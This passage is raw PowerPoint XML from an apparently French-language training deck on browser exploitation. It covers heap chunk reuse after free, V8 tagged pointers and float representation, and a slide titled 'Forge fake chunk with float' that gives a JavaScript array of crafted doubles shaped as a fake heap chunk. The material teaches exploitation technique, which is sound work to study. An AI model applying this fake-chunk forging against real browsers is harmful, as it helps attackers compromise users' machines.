            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Le dernier </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> libéré est réutilisé au prochain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>  si la taille correspond</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77" name="Espace réservé du texte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35C4305B-274A-6147-29A5-09A130FF0249}"/>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78" name="Espace réservé du texte 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A6D4102-3559-0D65-EDA6-41C2B4053194}"/>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Rappels</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3711830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7D2B775-8188-086B-BC23-A4D4669E48B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{767457D1-F337-7141-A4C4-1AF9EC9D8474}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>51</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé de la date 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6EE88F9-D61A-776C-03A3-8B4509D21AD0}"/>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CA7EEC9D-6281-FA4D-E665-CB289BC0FC80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>V8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>internals</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="ZoneTexte 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{595C3B61-5F8B-E92C-54A7-D651D3E693C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="366729" y="1262213"/>
            <a:ext cx="6719871" cy="300082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Pour consommer moins de mémoire V8 utilise des pointeurs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>taggé</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC0E1AD0-1BB9-9502-6A0D-FAFBBB9B4ED1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="500921" y="1722551"/>
            <a:ext cx="2952328"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31 bits </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>integer</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23D139AF-5AD8-6F59-CFCA-FD0543A96B20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3453249" y="1722551"/>
            <a:ext cx="288032"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0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AE8F8C0-014D-A485-D350-4FDE08360932}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="500921" y="2139905"/>
            <a:ext cx="2952328" cy="423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latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>address</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{907D3F72-91AB-85AA-86B4-68489C93A7D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3453249" y="2142904"/>
            <a:ext cx="288032" cy="4206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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="ZoneTexte 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A44943A-E62C-B47B-8DD6-B7327D6FC51F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3840750" y="1983554"/>
            <a:ext cx="1877824" cy="300082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>var a = [1,2,3];</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEE84E06-3BBC-C090-F6D6-DAF94EBF03A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6628255" y="1560241"/>
            <a:ext cx="1870400" cy="11467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00 00 00 02</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 00 00 04</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 00 00 06</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Flèche : bas 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52C16DEF-E41E-C8CB-A877-4208576CA1A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="5819299" y="1763013"/>
            <a:ext cx="496690" cy="753783"/>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5ECA2FE1-FF82-4F4C-42C5-C75E896DBFAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="337395" y="2731809"/>
            <a:ext cx="6719871" cy="300082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les nombres flottant sont représentés selon le standard IEEE 754</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="ZoneTexte 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D03CCC75-B3E5-B4E5-8E42-1DD2FF2243B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="867212" y="3315374"/>
            <a:ext cx="2520280" cy="300082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>2261634.0000000116 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="ZoneTexte 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1899D75B-0600-7AA5-A48B-441A78A9D902}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5080083" y="3313707"/>
            <a:ext cx="3096344" cy="300082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>19 00 00 00 41 41 41 41</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Flèche : bas 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C8C0F1C-6627-7D7A-5670-BC8103F583E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4039247" y="2764487"/>
            <a:ext cx="496690" cy="140185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8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CB452B3-1ED8-B6D0-2FD7-E0B1673EA309}"/>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4"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0"/>
              <a:t>Navigateur</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Espace réservé du texte 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE2E6E79-5156-52CC-AB73-A9A257151395}"/>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2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0"/>
              <a:t>Rappels</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="829896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579ECAA-93C4-BEED-8045-12BA8D71578B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{767457D1-F337-7141-A4C4-1AF9EC9D8474}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>52</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé de la date 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F7AC400-2C3B-4CB1-4A29-A9F8F9FB7534}"/>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5C7ABC00-9D89-B9C3-1283-80604C1A03B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Forge fake </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>float</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3E8B4BF-087B-B472-5A08-2327068EF629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6644920" y="1437297"/>
            <a:ext cx="1711256" cy="13627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00 00 00 19</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 00 00 19</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 00 00 19</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 00 00 19</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 00 00 19</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 00 00 19</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAA0A07C-8E85-696E-6C57-09B5F1864F23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6644920" y="1108039"/>
            <a:ext cx="1716680" cy="3292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00 00 00 19</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Connecteur droit avec flèche 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0084ABDB-31D7-1766-55BE-7912CF10B43F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6442471" y="1108039"/>
            <a:ext cx="0" cy="169196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436B9C9-A451-9E87-18F8-0200DE3DEF25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5550933" y="1860291"/>
            <a:ext cx="839416" cy="300082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0x18</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="ZoneTexte 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7017ABC-DA22-92F8-1F7E-0B711BDCF1C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="790020" y="1798461"/>
            <a:ext cx="2760900" cy="1546577"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>var a = [</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	5.30498947865e-313,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	5.30498947865e-313,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	5.30498947865e-313,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	5.30498947865e-313,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	5.30498947865e-313</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>];</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="Connecteur droit avec flèche 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE09F185-BB23-505C-7928-9D1DBACCD04E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6442471" y="2794566"/>
            <a:ext cx="0" cy="17469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F379C72-C2D1-6D4E-FCA8-F1DB3CB8B7DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5550933" y="3649696"/>
            <a:ext cx="839416" cy="300082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0x18</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Flèche : bas 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7EF127A-4C0C-B56E-D1B6-F550734EF968}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4415549" y="1870822"/>
            <a:ext cx="496690" cy="140185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F0FC1689-7453-7490-DB2C-92CF553466E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6644920" y="3118383"/>
            <a:ext cx="1721862" cy="13627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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rectangle 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64D1D08D-81DB-2CD8-C479-AFF916833946}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6644920" y="2794566"/>
            <a:ext cx="1716680" cy="3292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onsolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 00 00 19</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Espace réservé du texte 8">
            <a:extLst>
